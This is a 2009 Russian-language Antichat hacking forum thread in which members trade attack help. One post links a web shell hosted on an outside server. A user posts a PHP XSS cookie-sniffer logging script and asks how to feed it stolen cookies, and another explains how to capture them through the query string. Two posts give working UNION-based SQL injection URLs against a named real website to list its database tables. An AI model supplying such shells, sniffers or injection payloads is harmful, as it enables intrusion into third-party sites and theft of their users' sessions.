HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7651  
Старый 15.06.2009, 11:43
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Pashkela  
2 jokester:

Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница"

Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php

Проверь плиз, может я ваще после выходных с катушек съехал)

PS: А, дошло, если с99 запороленный - то фиг, wso2 пофигу, поэтому так и подумал

В общем jokester прав как всегда)

загвоздка была в том, чтобы с99 не был запороленный
jokester ..у меня тоже такая фигня была....но чем не факт сделать тхт? если получилось , работает)то смысл судить
 
Ответить с цитированием

  #7652  
Старый 15.06.2009, 11:45
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами: 10441826

Репутация: 1861


По умолчанию

Цитата:
Сообщение от HAXTA4OK  
но чем не факт сделать тхт? если получилось , работает)то смысл судить
дабы не путать новичков и не создавать ложных предрасудков и стереотипов
 
Ответить с цитированием

  #7653  
Старый 15.06.2009, 11:48
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

HAXTA4OK

Я уже несколько раз говорил, в чём разница. От непонимания возникают новые вопросы. Сделать тупо как показали, не поняв как это работает, это не выход. Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы
 
Ответить с цитированием

  #7654  
Старый 15.06.2009, 11:50
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Iceangel_  
дабы не путать новичков и не создавать ложных предрасудков и стереотипов
и вот ты думаешь что он понял что все ему написали? он просто по примеру сделал с тхт...дык и пусть потом пробует так!. а вот если не получится то спросит..а щас ему тут все понапишут и он вообще не поймет и бросит(не факт)
P.S. он хоть с тхт понял)))) так и пусть делает так



####################################
jokester

Советы должны быть максимально простыми и понятными, без лишних наворотов и путаницы

и вот ты думаешь что он понял что все ему написали?


P.S.пусть идет по ступенькам на примерах
##################################
main()

на тебе шелл ..позаимствовал у mailbrush _http://bestquest.info/shell.txt

Последний раз редактировалось HAXTA4OK; 15.06.2009 в 12:08..
 
Ответить с цитированием

  #7655  
Старый 15.06.2009, 14:31
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Это от меднета шелл, не от меня
 
Ответить с цитированием

  #7656  
Старый 15.06.2009, 14:47
main()
Banned
Регистрация: 10.06.2009
Сообщений: 8
С нами: 8905480

Репутация: 6
По умолчанию

Люди помогите плиз. Надо написать самый примитивный снифире XSS на php. читал статью
на ачате про XSS но снифер там какойто мудрённый, с шифрованием,с картинкой и т.д. надо простой сниф и всё может кто накатает. я вот накатал чтото похожее

PHP код:
<?php
$file
="log.txt";
$data=date("d.m.Y");
$time=date("H.i");

$ip=trim($_SERVER['REMOTE_ADDR']);
$agent=trim($_SERVER['HTTP_USER_AGENT']);


    
$fo=fopen($file,"a");
    
$res="$data|$time|$ip|$agent";
    
$fw=fputs($fo,$res);
    
fclose($fo);
?>
но как ему передать куки этому скрипту?
 
Ответить с цитированием

  #7657  
Старый 15.06.2009, 14:51
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Сниффер получает даные, переданые GET'oм, т.е. QUERY_STRING. Если сниффер - картинка - он загружается с даными, т.е. куками. Если ты хочешь без картинки - надо будет редиректить.

PS: Юзайте мой сервис http://forum.antichat.ru/thread125329.html

Последний раз редактировалось mailbrush; 15.06.2009 в 14:54..
 
Ответить с цитированием

  #7658  
Старый 15.06.2009, 14:56
main()
Banned
Регистрация: 10.06.2009
Сообщений: 8
С нами: 8905480

Репутация: 6
По умолчанию

Цитата:
Сообщение от mailbrush  
Сниффер получает даные, переданые GET'oм, т.е. QUERY_STRING. Если сниффер с картинкой - он загружается с даными, т.е. куками. Если ты хочешь без картинки - надо будет редиректить.

PS: Юзайте мой сервис http://forum.antichat.ru/thread125329.html
Помоги плиз изминитиь тот скрипт чтобы он через
QUERY_STRING записывал в файл. и составить url на багу. помогите плиз
 
Ответить с цитированием

  #7659  
Старый 15.06.2009, 15:26
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

не понимаю в чем ошибка моего запроса, вроде версия 5.0.51a-24-log
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=%27ro cit%27--

но ничего хорошего я не вижу.....
 
Ответить с цитированием

  #7660  
Старый 15.06.2009, 15:29
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от jecka3000  
не понимаю в чем ошибка моего запроса, вроде версия 5.0.51a-24-log
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+where+table_schema=%27ro cit%27--
но ничего хорошего я не вижу.....
http://www.rocit.ru/news/ITshownews.php3?id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...